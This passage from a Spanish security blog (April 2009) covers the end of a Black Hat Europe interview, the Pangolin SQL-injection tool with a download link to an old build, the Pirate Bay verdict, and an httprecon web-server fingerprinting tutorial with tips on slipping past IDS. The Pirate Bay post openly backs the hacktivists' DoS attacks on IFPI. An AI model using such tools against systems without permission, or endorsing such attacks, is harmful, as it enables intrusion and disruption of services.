Hay mucha gente que no es consciente de que Black Hat no son sólo conferencias de seguridad cada cierto tiempo, si no que existe una serie de eventos virtuales que son capaces también de reunir a muchas personas.

Ahora mismo existen sitios geniales como por ejemplo SecurityFocus y demás, que aportan noticias de actualidad, etc, y para nada queremos sustituirlos. Hace un tiempo comenzamos un grupo en Linkedin a modo de experimento, y ahora tenemos unas 3.000 personas unidas a él, lo que nos hizo ver que la gente se interesa por nosotros, así que es cuando nos planteamos empezar nuestro propio grupo. Además estudiábamos formas de poder distribuir nuestro contenido tanto en audio como en video. Y claro, por ejemplo un video de una hora de duración, subirlo a YouTube no parece muy viable, Google Video está de capa caída, blipTV nos pareció muy buena alternativa, pero de repente nos veíamos con la situación de "Vale, lo comparto por torrent, lo pongo online, lo pongo por descarga directa, que si BlipTV...". Ahí es cuando te das cuenta de que te pasas la mayor parte del tiempo subiendo el mismo contenido una y otra vez por todas partes, y cuando la gente lo quiere ver... ¿a dónde se dirige?


Por lo tanto, con esta nueva iniciativa también esperamos que nuestros visitantes puedan comentar estos contenidos, por ejemplo "se ha equivocado en el minuto 35, no tiene razón, no estoy de acuerdo" y cosas así. Lo que está claro es que si no podemos conseguir esta funcionalidad con otro sitio, lo mejor es que lo hagamos nosotros mismos.

Sobre el tema de los papers que os llegan como candidatos a dar una charla, ¿existe una gran cantidad año trás año, hay diferencias entre eventos?

Es curioso, porque por ejemplo, para nuestra edición anterior de Washington DC, tuvimos muy buen contenido pero en realidad no tuvimos muchísimas contribuciones. Las que nos llegaron fueron geniales, pero por algún motivo no hubo muchas propuestas. Para Amsterdam, si que nos llegaron muchísimas propuestas. Creemos que mucha gente prefiere esperar a los eventos que hacemos en verano, a los que nos llegan alrededor de unas 400 presentaciones.

El hecho de tener aquí únicamente dos tracks dificultará más todavía el filtrar que presentaciones pasan y cuales se rechazan o posponen.

Totalmente, a mi lo que me gustaría aquí es tener tres tracks, porque por ejemplo con ese número, creo que podríamos disponer de más variedad en la temática que se presenta, y así atraer a otros tipos de audiencia para poder seguir creciendo como comentaba antes. Ahora mismo con estos dos tracks me siento como "encerrado", llevamos unos 9 años en Europa y ya necesito los tres. Estos últimos cuatro años lo he intentado duramente, pero al final nunca era posible. Cuando encontramos este hotel que acababa de ser construido dijimos "por fín podremos tener el número que queríamos", pero no ha sido posible.

La tendencia últimamente en otras conferencias es la de realizar streaming de sus conferencias aún teniendo que pagar entrada, para que todo el mundo desde su casa pueda seguirlas.

Si bueno, nosotros vendemos los videos de las conferencias. Los codificamos, después los recodificamos a otros formatos como por ejemplo para ipods y demás, los compilamos y los repartimos. Pero durante aproximadamente los primeros 3 o 4 meses nos los distribuímos públicamente, ya que las ventas son las que pegan todo lo que implica esta edición de videos. De repente llegando a ese primer cuarto de año, las ventas decrecen considerablemente y es ahí cuando decidimos publicarlos a todo el mundo. De lo que nos hemos dado cuenta es de que muchas empresas compran nuestro contenido para ofrecerlo como formación interna a sus empleados, por ejemplo colgando los videos en su intranet y demás. Recibimos peticiones de Gobiernos y otras muchas compañías. Al resto de gente no le importa mucho el esperar unos pocos meses para ver ese material de manera visual, así que lo que hacemos es distribuir sin problemas la información, pero para poder pagar los costes de esa producción tenemos que retrasar un poco su publicación.

Pensamos en lo del streaming, pero cuando empiezas a tener en cuenta los costes de montar la infraestructura necesaria y otros detalles, y se te pasan por la cabeza cosas como que la conexión wireless del hotel se cae y no se qué... al final te das cuenta que no merecen la pena esos dolores de cabeza. Quizás si fuese una conferencia de una escala muchísimo mayor si, pero creo que ahora es algo que no merece ese esfuerzo.

Bueno, esto es todo, no vamos a robarte más tiempo, muchas gracias por atendernos y esperamos poder hablar contigo en otra ocasión.

¡Por supuesto! Nos vemos entonces...espero...el año que viene.

---

Hasta aquí la entrevista, que se realizó el día 17 de Abril de 2009. Pronto os traeremos el resumen del día 2 de esta Black Hat 09 Europe celebrada en Amsterdam.

[+] Resumen Black Hat '09 Europe: Día 1 (16 de Abril)
Leer más...

El Pangolin se hace mayor.

Pangolin es una herramienta para explotar inyecciones de código SQL en páginas web. Entre sus principales características se encuentra un interfaz muy sencillo y la capacidad de volcar información de múltiples bases de datos, entre ellas: Access, DB2, Informix, MSSQL, MySQL, Oracle, PostgreSQL, SQLite, o Sybase. Si no la conoces, puedes consultar un manual muy amplio y completo en la web de hacktimes.

Desgraciadamente, sus autores han decidido dejar de distribuir la aplicación completa de forma gratuita y ha pasado a ser comercial dividiendo el producto en distintas versiones: Free Edition, (versión muy reducida y gratuita), Standar Edition (200$), Professional Edition (450$) y Enterprise Edition (6.000$).

Una versión antigua aún está disponible para su descarga en la siguiente página web: http://down3.nosec.org/pangolin_bin.rar, aunque es probable que el enlace deje de funcionar en breve.





Leer más...
Como ya sabéis, el pasado viernes los tribunales suecos dictaron sentencia de 1 año de carcel y 4.5 mill. $ a pagar para los cuatro responsables de Pirate Bay, uno de los sitios más importantes de descargas de torrents.

Esto ha causado un gran revuelo entre los internautas y ciberactivistas, que el pasado lunes realizaron una serie de ataques DoS contra la asociación de la industria de la música ifpi.org y los abogados de la acusación. El ataque conocido con el nombre de Operation Baylout dejó indisponibles los servicios del site.

Las industrias discrográficas siempre han culpado a los sitios de descargas del descenso en las ventas musicales Lo curioso es que, hace unos días, salió un estudio que decía que los jovenes entre 15 y 20 años, que es la franja de edad que produce la mayor cantidad de descargas en programas P2P, compran 10 veces más música por internet que los que no descargan música.

Creo que el problema de la industria discográfica es que no quiere actualizar su modelo de negocio, que ha quedado anticuado, mientras que por ejemplo Apple en 5 años, con su iTunesStore se ha posicionado como la número uno en ventas de música.

Grupos como Radiohead o Nine Inch Nails, están explorando nuevas vías para sacar beneficios por su trabajo al margen de las discrográficas. En el caso de Radiohead, cuando publicó su ultimo disco en internet, para el que pedían donaciones, y sacaron más dinero que en sus discos anteriores o Nine Inch Nails que ha apostado por el opensource.

O empresas como Nokia, que han abierto un portal de música, y proporciona el servicio Comes with Music, que permite subscripciones de un año de descargas ilimitadas de la tienda de Nokia. O Vofadone que anuncia su servicio de descargas de música.

En mi opnión la industría discográfica debería acabar con su modelo anticuado de negocio y adaptarse a las nuevas vías de comercio que proporciona internet. Personalmente compro bastante música, libros, películas y entradas de los grupos a los que apoyo, cosa que no quita que descargue mucha música de la red, y ya cansa el tener que aguantar que me llamen pirata o criminal.

Desde aquí mi apoyo a los cuatro responsables de The Pirate Bay y a todos los hacktivistas que están intentando que la justicia anticuada que los ha condenado, rectifique.

[+] Noticia vista en The Register

Leer más...

21 abril 2009

Fingerprint de servidores web, httprecon 7.0

Los mensajes de bienvenida del servidor web son la pista principal para conocer que servicio es el que ofrece esas páginas. Pero no es la única forma de averiguarlo, estos mensajes o banners pueden ser modificados para revelar la menor información posible.

En el caso de Apache, modificando el fichero de configuración httpd.conf y añadiendo o modificando la directiva "ServerTokens": ServerTokens Prod

El valor "Prod" puede modificarse por "Major", "Minor", "Min", "OS" o "Full", aunque este último caso es como figura por defecto y no ocultaría ninguna información.

ServerTokens Prod[uctOnly]
Ejemplo: Server: Apache

ServerTokens Major
Ejemplo: Server: Apache/2

ServerTokens Minor
Ejemplo: Server: Apache/2.0

ServerTokens Min[imal]
Ejemplo: Server: Apache/2.0.41

ServerTokens OS
Ejemplo: Server: Apache/2.0.41 (Unix)

ServerTokens Full (o no especificado)
Ejemplo: Server: Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2

Para identificar y asegurar que no nos estan engañando, existen varias herramientas que mediante distintas peticiones y no exclusivamente observando esta cabecera, son capaces de diagnosticar el software utilizado, entre ellas httprint, hmap, WebServerFP o httprecon.

httprecon es posiblemente la más actualizada y eficaz de las mencionadas anteriormente. Hacerla funcionar es tan sencillo como indicarle la dirección URL a analizar y el puerto. Una vez introducido, al pulsar sobre "Analyze", ejecutará las peticiones y obtendrá un porcentaje de acierto. Cuanto más elevado sea, más probabilidad de que la predicción sea cierta.





Al exportar el resultado se permite configurar que información y en que formato, soportando los más comunes como son: HTML, XML, TXT o CSV.




Esta aplicación puede ser accedida online en la página web: http://w3dt.net/tools/httprecon/. desde la que se pueden lanzar pruebas y obtener resultados sin necesidad de instalar la herramienta o en caso de disponer de un sistema distinto de Windows.

Pese a la sencillez de la herramienta, las opciones de configuración son amplias, permitiendo especificar casi cualquier parámetro de las peticiones a ejecutar. Salvo que exista algún error, tal y como están por defecto son aplicables a la mayoría de los casos.

La primera pestaña permite modificar los tiempos de espera, si es ejecutada en una conexión muy lenta pueden elevarse estos números para sobrepasar los cortes.




La segunda pestaña indica los valores de acierto necesarios para evaluar el porcentaje de acierto. La modificación de estos valores puede suponer generar falsos positivos o falsos negativos. No se deberían modificar salvo que se requiera que un resultado siempre o nunca muestre un 100%.



La tercera pestaña permite seleccionar los tipos de test a analizar, puede ser útil, por ejemplo, si se quieren obviar pruebas en un entorno donde puede haber elementos intermedios que hagan filtrado.



Al igual que la pestaña anterior, se pueden especificar que método no debería estar permitido y que método no debería existir. Por ejemplo, en el caso de un WebDav, el método DELETE si estaría permitido, por lo que habría que modificarlo por otro.




La quinta pestaña, tal y como ocurre con otras, permite modificar la versión de HTTP permitida y la no permitida. En principio salvo que el servidor web sea del futuro o de hace 30 años, estos parámetros han de permanecer tal y como figuran.



La pestaña de "Resources" solicita una página que exista y otra que nó. En general el "/" del web siempre será una página existente y salvo mucha mala suerte, la cadena "WZ5oS1.html", será algo que no exista. Aunque si es posible que esta cadena acabe como firma en un sistema de detección de intrusos y no está de más que se permita configurar.




Longrequest indica el tamaño de una petición larga y el carácter a enviar, tal y como hemos contado antes, salvo que se desee saltar filtros o hacer trazabilidad, este parámetro no es necesario modificarlo.



Por último, la cadena User-Agent que identificará la aplicación en el servidor web, útil en caso de pasar inadvertido o en caso de desear ser visto.




Leer más...